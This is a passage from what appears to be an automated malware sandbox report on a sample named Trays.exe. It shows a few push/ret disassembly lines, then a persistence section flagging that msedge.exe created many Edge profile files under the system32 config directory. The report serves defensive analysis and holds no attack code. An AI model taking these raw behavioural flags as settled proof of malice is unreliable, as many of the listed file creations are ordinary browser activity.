    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_004079AC push 004079D8h; ret 41_2_004079D0
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_00414560 push 004146DCh; ret 41_2_004146D4
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_00414A08 push 00414A34h; ret 41_2_00414A2C

    Persistence and Installation Behavior

    barindex
    Creates files in the system32 config directory
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6782159F-1D6C.pma
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\cache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\download_cache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\warnStateCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\lockfile
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Last Version
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\README
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_2
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\History
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Web Data
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Web Data-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Favicons
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Favicons-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\5c07473f-281c-45cb-bea7-aab2092a1778.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Safe Browsing
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\First Run
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\FirstLaunchAfterInstallation
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\8097023c-d1dd-4803-b7e9-55bb1d2582a4.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris_638343870221005468
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\synchronousLookupUris
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\75387db4-416b-4965-9d86-de9deab1a890.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico~RF1f90a0.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\b04a53e9-e829-40a2-bd2d-80571496c6a2.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\3c2ef124-1048-4984-9f26-ddfeb12ce27d.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_2
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Speech Recognition
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\OriginTrials
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Subresource Filter
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Edge Shopping
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\WidevineCdm
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State~RF1f912d.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sessions
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic_638004170464094982
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\topTraffic
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_2
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\a14c0f62-50b6-4212-af3b-5b2b74bab812.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\449b6e7f-5636-42fd-8860-a4442803978d.tmp
